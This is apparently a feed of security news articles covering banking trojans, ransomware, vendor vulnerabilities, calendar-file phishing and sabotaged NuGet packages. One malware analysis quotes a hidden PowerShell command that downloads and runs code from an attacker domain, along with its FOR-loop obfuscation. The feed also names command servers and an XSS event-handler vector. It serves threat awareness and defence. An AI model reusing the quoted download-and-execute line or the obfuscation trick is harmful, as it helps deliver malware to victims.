• Security researchers from CyberProof have discovered significant connections between two advanced banking trojans targeting Brazilian users and financial institutions.

    The Maverick banking malware, identified through suspicious file downloads via WhatsApp, shares remarkable similarities with the earlier reported Coyote malware campaign.

    Both threats employ sophisticated infection chains and demonstrate nearly identical behavioral patterns.

    The discovery emerged when CyberProof security analysts identified incidents involving malicious file downloads through WhatsApp.

    Investigation revealed these threats utilize .NET frameworks and deploy multi-stage infection beginning with link files spawning PowerShell commands.

    Both malware families target Brazilian banks, employ similar encryption to decrypt banking URLs, and demonstrate nearly identical monitoring routines.

    The attack begins when victims receive ZIP files through WhatsApp containing malicious LNK shortcut files. Upon execution, these deploy heavily obfuscated PowerShell commands designed to evade detection.

    CyberProof security researchers noted that malware constructs commands through complex FOR loops, splitting executable names and parameters into fragments to bypass monitoring.

    Malicious ZIP file downloaded from WhatsApp web (Source - CyberProof)
    Malicious ZIP file downloaded from WhatsApp web (Source – CyberProof)

    The infection demonstrates sophisticated evasion techniques. The malware employs Base64 and UTF-16LE encoding combined with string concatenation to reconstruct malicious PowerShell commands. One analyzed sample showed the following obfuscation pattern:-

    for %y in (pow) do for %c in (er) do for %V in (shel) 
    do for %q in (1.e) do for %A in (xe) do 
    %y%c%V%q%A → powershell.exe
    Variables and values assigned in the for loop (Source - CyberProof)
    Variables and values assigned in the for loop (Source – CyberProof)

    Once decoded, the PowerShell command contacts attacker-controlled infrastructure to download additional payloads.

    The decoded command establishes connections to malicious domains for further infection.

    powershell.exe -w hid -enc IEX (New-Object Net.WebClient).
    DownloadString('hxxps://zapgrande[.]com/api/itbi/BrDLwQ4tU70z')
    Working of for loop of the script (Source - CyberProof)
    Working of for loop of the script (Source – CyberProof)

    Persistence and Detection Evasion

    The malware establishes persistence by dropping batch files in the Windows startup folder using a naming pattern of HealthApp- followed by GUID and .bat extension.

    This creates outbound connections to command servers at domains like sorvetenopote[.]com and zapgrande[.]com.

    The Maverick agent performs extensive victim profiling before executing banking theft functionality.

    It checks Brazilian timezone settings, locale configurations, regional settings, and date formats. The malware terminates itself if criteria are not met, ensuring operation within intended geography.

    Both Maverick and Coyote employ AES encryption with GZIP compression in CBC mode to decrypt stored banking URLs from Base64 strings.

    This encryption similarity, combined with nearly identical banking monitoring code, strongly suggests shared development origins. The malware monitors browsers including Chrome, Firefox, Edge, Opera, and Brave for connections to over 50 Brazilian financial institutions.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Researchers Uncover the Strong Links Between Maverick and Coyote Banking Malwares appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Ivanti has released critical security updates for Ivanti Endpoint Manager to address three high-severity vulnerabilities that could allow authenticated attackers to write arbitrary files to any location on affected systems. The company disclosed the security advisory on November 10, 2025, with the latest patch becoming available immediately. CVE Number Description CVSS Score Severity CVE-2025-10918 Insecure […]

    The post Ivanti Endpoint Manager Vulnerabilities Let Attackers Write Files Anywhere on Target Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The malware known as GootLoader has resurfaced yet again after a brief spike in activity earlier this March, according to new findings from Huntress. The cybersecurity company said it observed three GootLoader infections since October 27, 2025, out of which two resulted in hands-on keyboard intrusions with domain controller compromise taking place within 17 hours of initial infection. “

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • VanHelsing has emerged as a sophisticated ransomware-as-a-service operation that fundamentally changes the threat landscape for organizations worldwide.

    First observed on March 7, 2025, this multi-platform locker represents a significant escalation in ransomware deployment strategies by providing affiliates with a streamlined service model.

    The operation requires a $5,000 deposit from new affiliates and rewards them with 80 percent of all ransom payments, creating a scalable criminal enterprise that rapidly deploys attacks across diverse computing environments.

    Picus Security analysts identified that the ransomware targets not only traditional Windows systems but also extends its reach to Linux servers, BSD installations, ARM-based devices, and ESXi virtualization infrastructure, significantly broadening the scope of potential victims.

    The RaaS model’s aggressive market entry has already demonstrated tangible impact. Within two weeks of its launch, the group successfully compromised at least three known victims and initiated ransom negotiations, with one demand reportedly reaching $500,000.

    The operation’s only stated restriction prohibits targeting nations within the Commonwealth of Independent States, suggesting coordination between the threat actors and certain geopolitical interests.

    The sophistication of this approach lies in its operational flexibility, where affiliates receive a user-friendly control panel to orchestrate their campaigns independently while maintaining centralized infrastructure under the operators’ control.

    Picussecurity security analysts identified that the VanHelsing locker represents a tool under active and rapid development.

    The discovery of two variants compiled merely five days apart reveals continuous enhancement and refinement of the malware’s capabilities.

    This development velocity suggests the operators are responding to defensive measures and expanding functionality based on affiliate feedback and real-world deployment experiences.

    Mutation and Configuration Strategy

    The ransomware’s architecture reveals deliberate design choices that prioritize operational flexibility over stealth. Written in C++, VanHelsing employs an extensive command-line argument system that enables operators to customize attack behavior to specific target environments.

    Upon execution, the malware attempts to create a named mutex called “Global\VanHelsing” to prevent multiple instances from interfering with encryption processes, though this protection can be bypassed using the Force argument.

    The ransomware increases its process priority to receive preferential treatment from the operating system scheduler, accelerating encryption completion unless suppressed by the no-priority flag.

    The cryptographic implementation demonstrates security expertise. VanHelsing generates unique 32-byte keys and 12-byte nonces for each file, encrypting content with the ChaCha20 stream cipher.

    These ephemeral values are subsequently encrypted using an embedded Curve25519 public key hardcoded within the binary, ensuring only operators holding the private key can decrypt victim files.

    Additional command-line arguments like silent mode enable two-stage encryption without triggering security alerts, while spread-smb facilitates lateral movement across network shares.

    This technical sophistication combined with operational flexibility establishes VanHelsing as a formidable threat requiring comprehensive defensive strategies across all supported platforms.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post New VanHelsing Ransomware RaaS Model Attacking Windows, Linux, BSD, ARM, and ESXi Systems appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Ivanti has rolled out security updates for its Endpoint Manager product, addressing three high-severity vulnerabilities that could let authenticated local attackers write arbitrary files anywhere on the system disk.

    The flaws, if exploited, pose significant risks to enterprise environments by potentially allowing malicious code execution or data tampering.

    The most recent issue, tracked as CVE-2025-10918, stems from insecure default permissions in the Endpoint Manager agent versions prior to 2024 SU4.

    This vulnerability carries a CVSS score of 7.1 (High), with a vector of CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H, and aligns with CWE-276 for incorrect default permissions. Attackers with local authenticated access could leverage it to overwrite critical files, escalating privileges or disrupting operations.

    Ivanti Endpoint Manager Vulnerabilities

    Ivanti also patched two previously disclosed vulnerabilities from October 2025: CVE-2025-9713 and CVE-2025-11622. While specific details on these were not reiterated in the latest advisory, they contribute to the same arbitrary file write threat model.

    Importantly, Ivanti reports no known customer exploitation of any of these issues at the time of disclosure, crediting its responsible disclosure program for early detection.

    Affected systems include Ivanti Endpoint Manager 2024 SU3 SR1 and earlier versions. The fixes are available in the newly released 2024 SU4 update, downloadable via Ivanti’s License System portal for eligible customers.

    Users on the older 2022 branch face a harder road: that version reached end-of-life at the end of October 2025, so no patches will be issued. Organizations must upgrade to 2024 SU4 to mitigate risks.

    CVE NumberDescriptionCVSS Score (Severity)Attack RequirementsPotential Impact
    CVE-2025-10918Insecure default permissions in the agent allow a local authenticated attacker to write arbitrary files anywhere on disk.7.1 (High)Local authenticated access.File tampering, privilege escalation via overwrites.
    CVE-2025-9713Path traversal allows a remote unauthenticated attacker to achieve remote code execution, enabling arbitrary file writes; user interaction required.8.8 (High)Remote unauthenticated, user interaction (e.g., malicious file import).RCE leading to full system compromise and file manipulation.
    CVE-2025-11622Insecure deserialization allows a local authenticated attacker to escalate privileges, facilitating arbitrary file writes post-escalation.7.8 (High)Local authenticated access.Privilege escalation enabling broader file access and execution.

    Ivanti extends its thanks to security researcher Enrique Fernández Lorenzo, known as bighound, for responsibly reporting CVE-2025-10918. The company emphasizes its commitment to vulnerability disclosure, inviting ethical hackers to engage through its policy.

    For those assessing exposure, Ivanti notes no public indicators of compromise exist yet, as exploitation remains undetected. Administrators should prioritize patching to safeguard endpoint management integrity. With cyber threats evolving rapidly, timely updates remain a cornerstone of defense in managed IT ecosystems.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Ivanti Endpoint Manager Vulnerabilities Let Attackers Write Arbitrary Files to Disk appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated remote data-wipe attack targeting Android devices has emerged, exploiting Google’s Find Hub service to execute destructive operations on smartphones and tablets across South Korea.

    This campaign represents the first documented case where state-sponsored threat actors weaponized a legitimate device protection service to remotely erase user data and disrupt normal device operations.

    The malware, distributed through trusted messaging platforms, demonstrates an evolution in attack sophistication by combining social engineering, persistent backdoors, and abuse of built-in security features.

    The attack begins with malicious files disguised as stress-relief programs distributed via KakaoTalk messenger.

    Victims receive a ZIP archive named “Stress Clear.zip” containing a Microsoft Installer (MSI) package that executes silently in the background while displaying fake error messages about language pack compatibility.

    Once installed, the malware establishes persistence through AutoIt scripts registered in Windows Task Scheduler and maintains command-and-control communication with servers located in Germany, specifically at 116.202.99.218 and the domain bp-analytics.de.

    Genians security researchers identified this campaign as part of the KONNI APT operation, linked to North Korean state-sponsored groups Kimsuky and APT37, both operating under the 63 Research Center.

    The initial compromise occurred on September 5, 2025, when threat actors hijacked the KakaoTalk account of a South Korean psychological counselor specializing in support for North Korean defector youth.

    Kimsuky and KONNI Groups under the 63 Research Center (Source - Genians)
    Kimsuky and KONNI Groups under the 63 Research Center (Source – Genians)

    The attackers leveraged this trusted relationship to distribute malicious files to the counselor’s contacts, turning victims into unwitting distribution channels for further propagation.

    Following system compromise, the malware deploys multiple remote access trojans including RemcosRAT 7.0.4 Pro, QuasarRAT, and RftRAT.

    These payloads enable comprehensive system surveillance through webcam monitoring, keystroke logging, and credential harvesting.

    The threat actors specifically targeted Google account credentials to gain unauthorized access to Find Hub, Google’s device management service designed to locate and protect lost or stolen Android devices.

    Once credentials were obtained, attackers executed remote factory reset commands on victims’ smartphones and tablets, permanently deleting personal data and rendering devices temporarily unusable.

    Infection Mechanism and Persistence Tactics

    The infection chain initiates when users execute the “Stress Clear.msi” file, which carries a fraudulent digital signature issued to “Chengdu Hechenyingjia Mining Partnership Enterprise” in China.

    This code-signing abuse provides an appearance of legitimacy that bypasses initial security checks.

    During installation, the MSI package invokes an embedded batch script “install.bat” that copies AutoIt3.exe and the malicious script “loKITr.au3” to the public Music folder at C:\Users\Public\Music.

    The install.bat script creates a scheduled task using a renamed copy of schtasks.exe called “hwpviewer.exe” to masquerade as a legitimate document viewer.

    This task executes the AutoIt script every minute, ensuring persistent malware execution even after system restarts. The script then deletes the original installation files to eliminate forensic traces.

    Meanwhile, error.vbs displays a deceptive Korean-language error message claiming incompatibility between system and program language packs, convincing users that installation failed when malicious operations are actually completing successfully.

    Attack flowchart (Source – Genians)

    The AutoIt script loKITr.au3 functions as the primary backdoor component, establishing encrypted connections to command-and-control infrastructure and downloading additional malicious modules.

    Analysis revealed the script uses the mutex identifier “Global\AB732E15-D8DD-87A1-7464-CE6698819E701” to prevent duplicate execution and registers a startup shortcut named “Smart_Web.Ink” for automatic launch during system boot.

    The malware conceals its true functionality through obfuscation techniques including unnecessary code insertion and encoding of critical strings.

    Once established, the backdoor enables comprehensive system monitoring and remote control capabilities.

    Threat actors activate webcams and microphones to surveil victims’ physical environments, identifying periods of absence to conduct operations undetected.

    The malware exfiltrates sensitive data, including credentials for Google and Naver accounts, which become the gateway for executing the most destructive aspect of the attack.

    After confirming through Find Hub location queries that victims are away from their devices, attackers issue remote factory reset commands to Android smartphones and tablets, deleting all stored data and disrupting communication channels.

    This coordinated approach of surveillance, credential theft, and destructive actions demonstrates tactical maturity rarely observed in APT operations targeting mobile platforms.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Android Remote Data-Wipe Malware Attacking Users Leveraging Google’s Find Hub appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Synology has released an urgent security update addressing a critical remote code execution vulnerability in BeeStation OS that allows unauthenticated attackers to execute arbitrary code on affected devices.

    The vulnerability, tracked as CVE-2025-12686 and identified by ZDI-CAN-28275, carries a critical CVSS3 base score of 9.8, reflecting its severe impact and exploitability.

    The flaw stems from a classic buffer overflow vulnerability (CWE-120) in BeeStation OS, making it exposed to network-based attacks without requiring authentication or user interaction.

    Synology BeeStation 0-Day Vulnerability

    The buffer overflow condition in BeeStation OS allows remote attackers to craft malicious inputs that overflow memory buffers, potentially leading to complete system compromise.

    With a CVSS3 vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A: H, the vulnerability demonstrates low attack complexity, network accessibility, and no privilege or user interaction requirements.

    CVE IDVulnerability NameSeverityCVSS3 Base ScoreCVSS3 Vector
    CVE-2025-12686Buffer Overflow in BeeStation OSCritical9.8AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

    This combination makes the flaw slight exploitable in real-world scenarios. Currently, there is no available mitigation strategy, making immediate patching the only viable defense.

    Affected Products and Patches

    Synology has released security updates for all affected BeeStation OS versions:

    ProductUpdate To
    BeeStation OS 1.01.3.2-65648+
    BeeStation OS 1.11.3.2-65648+
    BeeStation OS 1.21.3.2-65648+
    BeeStation OS 1.31.3.2-65648+

    Organizations and users with BeeStation devices should prioritize firmware updates immediately. Nature of this vulnerability, combined with the absence of workarounds, necessitates urgent action to prevent potential exploitation by threat actors.

    Given the ease of exploitation and remote accessibility, delaying patches exposes systems to significant risk. Synology researchers demonstrated the potential for exploitation through the Zero Day Initiative program. This collaborative disclosure ensures timely patching while protecting users from active exploitation.

    BeeStation users are to check their device versions and apply the recommended updates without delay to eliminate this remote code execution threat.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Synology BeeStation 0-Day Vulnerability Let Remote Attackers Execute Arbitrary Code appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A surge in attacks exploiting iCalendar (.ics) files as a sophisticated threat vector that bypasses traditional email security defenses. These attacks leverage the trusted, plain-text nature of calendar invitations to deliver credential phishing campaigns, malware payloads, and zero-day exploits.

    Over the past year, calendar-based phishing has emerged as the third most common email social engineering vector, with a 59% bypass rate against Secure Email Gateways (SEGs) and affecting hundreds of organizations worldwide through campaigns delivering thousands of malicious invites.

    The iCalendar format, standardized under RFC 5545, was designed as a text-based, universally interoperable standard for exchanging calendar and scheduling information across platforms, including Microsoft Outlook, Google Calendar, and Apple iCal.

    This simplicity, while enabling seamless integration, creates exploitable attack surfaces that security solutions struggle to monitor effectively.

    The format consists of structured components beginning with VCALENDAR containers that encapsulate VEVENT entries, each containing properties such as DTSTART, DTEND, SUMMARY, LOCATION, DESCRIPTION, and ATTACH.

    Attackers exploit multiple fields within .ics files to embed malicious content. The DESCRIPTION and LOCATION fields can contain clickable URLs that redirect victims to credential phishing pages masquerading as legitimate login portals.

    The ATTACH property supports both URI references and base64-encoded binary content, allowing attackers to embed malware payloads directly within the calendar file itself.

    Security researchers at NCC Group demonstrated that files referenced by URI in ATTACH properties are automatically embedded when calendar invites are exported or forwarded, enabling silent data exfiltration from victim systems.

    These base64-encoded attachments can include executable files, malicious scripts, or DLL components that execute without triggering traditional antivirus detection.

    The ORGANIZER and ATTENDEE fields enable sophisticated social engineering through sender spoofing, where attackers forge identities of trusted contacts or authority figures to increase legitimacy.

    Calendar applications process these fields to display sender information, and because invites often originate from legitimate calendar services like Google Calendar or Microsoft Exchange servers, they pass SPF, DKIM, and DMARC authentication checks that would normally flag spoofed emails.

    Why Traditional Security Defenses Fail Against Calendar Files

    Security tooling has historically focused on attachments that execute code or contain macros, treating .ics files as benign text documents that pose minimal risk.

    Most email gateways and endpoint filters lack deep inspection capabilities for calendar files, failing to parse BEGIN:VCALENDAR content or examine embedded URLs and base64-encoded data within ATTACH fields.

    This creates a critical security gap that attackers actively exploit, with calendar files slipping through filters designed to catch executables, Office documents with macros, and archive files.

    The automatic processing mechanisms built into calendar applications compound this vulnerability. In certain configurations, Microsoft Outlook and Google Calendar automatically process .ics attachments and create tentative calendar events even if users never open the originating email or if the email is quarantined by security solutions.

    This “invisible click” problem means malicious links become integrated into users’ trusted calendar interfaces, appearing as legitimate business events rather than suspicious emails.

    When calendar reminders trigger hours or days later, users perceive them as part of their normal workflow rather than potential security threats, dramatically increasing click-through rates compared to traditional phishing emails.

    Research by Cymulate revealed that calendar files with malicious attachments achieved penetration rates of 59% and 68% against SEGs, significantly higher than most other attack vectors.

    This effectiveness stems from several factors: .ics files use the MIME type “text/calendar” which security filters classify as low-risk; their plain-text structure makes them appear harmless during automated scanning; and the volume of legitimate calendar invites flowing through enterprise environments makes anomaly detection challenging.

    Furthermore, Sublime Security researchers discovered that calendar entries often persist even when email security solutions successfully quarantine the originating message, creating a dual-payload delivery mechanism where both the email and calendar event must be addressed for complete remediation.

    This persistence gives attackers two opportunities for successful compromise and extends the attack window beyond the initial email delivery.

    Real-World Attack Campaigns and Exploitation in the Wild

    Zimbra Zero-Day Exploitation (CVE-2025-27915)

    The most sophisticated calendar file exploitation emerged in early 2025 when threat actors weaponized a zero-day vulnerability in Zimbra Collaboration Suite affecting versions 9.0 through 10.1.

    Tracked as CVE-2025-27915, this stored cross-site scripting (XSS) flaw stemmed from insufficient HTML sanitization in .ics file parsing, specifically exploiting the <details ontoggle> HTML event to execute arbitrary JavaScript when victims opened malicious calendar invitations.

    StrikeReady researchers discovered the attacks while monitoring for .ics files larger than 10KB containing embedded JavaScript code. The campaign, detected in January 2025 before Zimbra’s patch release on January 27, targeted Brazilian military organizations through emails spoofing the Libyan Navy’s Office of Protocol.

    The malicious .ics files contained 100KB JavaScript payloads obfuscated using base64 encoding, designed to execute within victims’ browser sessions and perform comprehensive data theft operations.

    The malware implemented sophisticated evasion techniques, including a 60-second execution delay, a three-day execution gate ensuring it only ran if at least three days had passed since the last execution, and UI element hiding to reduce visual detection clues.

    Once activated, the malicious code created hidden username and password fields to steal credentials from login forms, monitored user activity through mouse and keyboard tracking, and logged out inactive users to trigger credential theft.

    The payload utilized Zimbra’s SOAP API to search folders and retrieve emails, exfiltrating content to the command-and-control domain ffrk.net every four hours.

    It established persistence by creating a mail filter named “Correo” that forwarded all messages to attacker-controlled Proton addresses, and collected authentication artifacts, including two-factor authentication scratch codes, trusted device tokens, and app-specific passwords.

    CISA added CVE-2025-27915 to its Known Exploited Vulnerabilities catalog following confirmation of active exploitation against government entities. Security researchers noted TTPs similar to those attributed to UNC1151, a Belarusian state-sponsored threat group known for targeting government and military organizations through webmail exploitation.

    Google Calendar Spoofing Campaign

    Check Point researchers identified a massive phishing campaign that leveraged Google Calendar’s trusted infrastructure to deliver over 4,000 spoofed calendar invites to approximately 300 organizations within a four-week period.

    Attackers manipulated email headers to make invitations appear as if they were sent via Google Calendar on behalf of known, legitimate individuals, successfully bypassing spam filters by passing DKIM, SPF, and DMARC security checks.

    The campaign initially exploited Google Calendar features that linked to Google Forms, but evolved when security products began flagging these invitations, with attackers pivoting to Google Drawings to maintain effectiveness.

    The attack chain embedded calendar files (.ics) or links leading to fake support pages disguised as cryptocurrency mining or Bitcoin support sites.

    Users who interacted with these invites encountered fake reCAPTCHA verification pages or support buttons that ultimately redirected them to credential phishing pages designed to harvest login credentials, payment details, and personal information.

    The financial motivation behind these attacks enabled cybercriminals to engage in credit card fraud, unauthorized transactions, and security measures bypasses across multiple accounts using stolen data.

    Cofense researchers documented a related campaign where attackers exploited .ics calendar invites sent from compromised school district email accounts, containing links to documents hosted on Microsoft SharePoint that led to Wells Fargo phishing pages requesting sensitive banking information, including login credentials, PINs, and account numbers.

    Google Threat Intelligence Group discovered in late October 2024 that Chinese state-sponsored threat actor APT41 deployed malware hosted on a compromised government website to target multiple government entities using an innovative command-and-control mechanism through Google Calendar.

    The campaign delivered spear-phishing emails containing links to ZIP archives that included a Windows shortcut (LNK) file disguised as a PDF document alongside seven image files, two of which were actually encrypted malware payloads.

    When victims executed the LNK file, it displayed a decoy PDF claiming that the listed species required an export declaration while silently initiating a three-stage infection chain.

    The PLUSDROP component decrypted the malicious payload using XOR-based routines and executed it via Rundll32.exe; PLUSINJECT employed process hollowing to inject code into legitimate svchost.exe processes for evasion; and TOUGHPROGRESS established the primary backdoor with Google Calendar C2 capabilities.

    The malware’s distinctive feature was its abuse of Google Calendar for command-and-control operations, creating zero-minute events at hard-coded dates (May 30, 2023) with encrypted exfiltrated data embedded in event descriptions.

    Attackers placed encrypted commands in Calendar events dated July 30 and 31, 2023, which the malware polled, decrypted, and executed on compromised Windows hosts before writing results back to new Calendar events for attacker retrieval.

    This technique allowed APT41 to blend malicious C2 traffic with legitimate cloud service activity, evading traditional network-based detection mechanisms.

    Google implemented custom detection fingerprints to identify and disable malicious calendar instances, terminated attacker-controlled Workspace projects, and added harmful domains to Safe Browsing blocklists.

    The campaign demonstrated the convergence of state-sponsored cyber-espionage with cloud service abuse, highlighting how trusted platforms can be weaponized for persistent access and data exfiltration.

    Microsoft Outlook DDE Vulnerability Exploitation

    Dynamic Data Exchange (DDE) protocol vulnerabilities in Microsoft Outlook created additional attack surfaces for calendar-based exploits prior to security updates.

    Researchers discovered that attackers could embed malicious DDE code within calendar invitation bodies, enabling phishing scams without traditional file attachments.

    When victims opened these calendar invites, specially crafted DDE fields triggered code execution that could launch arbitrary commands or download malware, though users received two dialog boxes requesting permission before execution occurred.

    Security firm SentinelOne demonstrated how easy it was to exploit DDE in calendar invites, showing that attackers could use social engineering to convince users that clicking “Yes” on the prompts was necessary to view the invitation properly.

    Microsoft addressed the most critical Outlook vulnerability tracked as CVE-2023-35636 in December 2023, which could leak NTLM v2 hashed passwords through malicious calendar invites with a single click when processing specially crafted .ics files.

    Threat actors infused malicious headers into .ics files that forced remote code execution, sending hashed passwords to attacker-controlled systems where offline brute-force or relay attacks could compromise accounts.

    A subsequent vulnerability in Microsoft Outlook discovered in 2025 (CVE-2025-32705) enabled remote code execution through improper memory handling when parsing specially crafted email content or calendar invitations.

    This buffer overread vulnerability allowed attackers to manipulate Content-Length headers or embed oversized ICS file elements to overwrite adjacent memory regions, executing shellcode in the context of logged-in users.

    The exploit particularly threatened enterprises using Outlook for calendaring and task management, where automatic preview features could trigger the flaw without explicit file opens.

    Detection, Mitigation, and Defensive Strategies

    Organizations must treat .ics files as active content requiring the same scrutiny as executables or scripts. Email security solutions should be configured to deeply inspect calendar files for embedded URLs, base64-encoded data, ATTACH fields, and HTML content.

    Sublime Security developed specialized ICS phishing functionality that automatically removes malicious calendar invites from calendars during message remediation, addressing the persistence problem where entries remain after email quarantine.

    This capability deletes corresponding events from calendars when messages are sent to quarantine, spam, or trash, preventing the dual-payload delivery mechanism.​​

    Calendar client default settings require modification to prevent automatic event creation from external sources. For Google Workspace, administrators should navigate to Apps → Google Workspace → Calendar → Advanced settings and set “Add invitations to my calendar” to either “Invitations from known senders” or “Invitations users have responded to via email”.

    In Microsoft 365 environments, PowerShell commands should set AutomateProcessing to None, disabling the Calendar Attendant from automatically processing invites. Exchange Online administrators can configure quarantine rules for emails containing .ics files from external senders, and Group Policy settings should disable automatic preview panes.

    Microsoft Teams calendar invites present similar risks, with attackers weaponizing invites to deliver malicious content directly onto calendars even when Microsoft Defender quarantines the original email.

    Organizations should disable the AllowAnonymousUsersToJoinMeeting setting where possible, implement Microsoft Teams Meeting Policies to restrict auto-join behavior and external invites, and leverage brand impersonation protection and phishing alerts being rolled out for Teams.

    The weaponization of calendar files represents a significant evolution in cyber threat tactics that exploits fundamental trust assumptions built into enterprise collaboration platforms.

    With a 59% bypass rate against traditional Secure Email Gateways and campaigns affecting hundreds of organizations globally, .ics file attacks demand immediate defensive attention from security teams.

    The technical sophistication demonstrated in zero-day exploits like Zimbra CVE-2025-27915, combined with state-sponsored groups like APT41 innovating C2 mechanisms through Google Calendar, illustrates how attackers continuously adapt to security improvements.

    Organizations must recognize that calendar invitations can no longer be treated as benign scheduling communications but rather as potential attack vectors requiring rigorous security controls. The convergence of automatic processing mechanisms, social engineering effectiveness, and security tool blind spots creates ideal conditions for attacker success.

    Comprehensive defense requires layered approaches combining technical controls such as CDR and deep packet inspection, configuration hardening to disable automatic event creation, behavioral monitoring for anomalous calendar activity, and sustained user awareness training emphasizing verification protocols.

    As threat actors continue refining calendar-based attack techniques and expanding their integration with broader compromise campaigns, the security community must prioritize this vector in threat modeling and defense architecture planning. ​

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Hackers Weaponizing Calendar Files as New Attack Vector Bypassing Traditional Email Defenses appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated supply chain attack has emerged, targeting industrial control systems through compromised .NET packages.

    The threat landscape shifted on November 5, 2025, when researchers identified nine malicious NuGet packages designed to inject destructive payloads into critical infrastructure environments.

    Published under the NuGet alias shanhai666 between 2023 and 2024, these packages accumulated nearly 9,500 downloads before detection, establishing a significant foothold in production environments worldwide.

    shanhai666 NuGet profile showing legitimate and benign packages (Source - Socket.dev)
    shanhai666 NuGet profile showing legitimate and benign packages (Source – Socket.dev)

    The threat actor employed an innovative approach that blurs the line between legitimate functionality and malicious intent.

    Each package provides complete, working implementations of their advertised features, including database repository patterns, LINQ support, pagination methods, and asynchronous operations.

    This 99% functional code serves as an effective smokescreen, allowing packages to pass code reviews and establish developer trust while concealing approximately 20 lines of malicious code buried within thousands of lines of legitimate implementation.

    The strategy ensures packages work exactly as advertised, providing genuine value that encourages adoption and delays discovery even after the malware activates.

    The most critical package, Sharp7Extend, directly targets industrial PLCs with dual sabotage mechanisms designed to compromise safety-critical systems.

    This package employs both immediate random process termination and silent write failures that begin 30 to 90 minutes after installation.

    The implications for manufacturing environments are severe, potentially affecting actuators, setpoints, and safety system operations.

    Socket security analysts identified the malware after examining package behavior patterns and discovering the probabilistic execution logic embedded within extension methods.

    Attack methodology

    The attack methodology represents a fundamental shift in supply chain threat sophistication. Rather than attempting to hide completely, the attacker embedded malicious logic within C# extension methods that transparently intercept database and PLC operations.

    Each database query or PLC communication operation triggers these methods automatically, which check the current date against hardcoded trigger dates ranging from August 2027 to June 2028.

    Once triggered, the malware generates a random number between 1 and 100. If this number exceeds 80, a 20% probability event occurs: Process.GetCurrentProcess().Kill() executes, terminating the entire application without warning.

    The Sharp7Extend write operation sabotage mechanism operates through a configurable delay system disguised as configuration-based control.

    Upon installation, a random 30 to 90 minute grace period activates during which all operations function normally, allowing initial deployment testing to succeed.

    Once this window closes, write operations fail silently 80% of the time by returning zero instead of actual results, creating data integrity issues without obvious error messages.

    For industrial environments relying on PLC write operations to control critical systems, this represents an existential threat to operational continuity and safety. The psychological impact of this attack extends beyond immediate system failure.

    The staggered activation windows mean developers who installed packages in 2024 will have moved to different projects or companies by 2027 when database malware triggers, making attribution and forensic investigation nearly impossible.

    Production applications executing hundreds of queries per hour will crash within seconds, with manufacturing environments experiencing combined process termination and silent write failures that mimic intermittent hardware problems.

    Organizations must immediately audit dependencies for these nine malicious packages and implement dependency scanning before merge, monitoring specifically for time-based logic, probabilistic execution patterns, and typosquats targeting industrial control libraries.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Weaponized NuGet Packages Inject Time-Delayed Destructive Payloads to Attack ICS Systems appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A security vulnerability has been discovered in Zoom Workplace’s VDI Client for Windows that could allow attackers to escalate their privileges on affected systems. The flaw, tracked as CVE-2025-64740 and assigned bulletin ZSB-25042, has been rated as High severity with a CVSS score of 7.5. Attribute Details CVE ID CVE-2025-64740 Bulletin ID ZSB-25042 Product Zoom Workplace VDI […]

    The post Zoom Workplace for Windows Flaw Allows Local Privilege Escalation appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶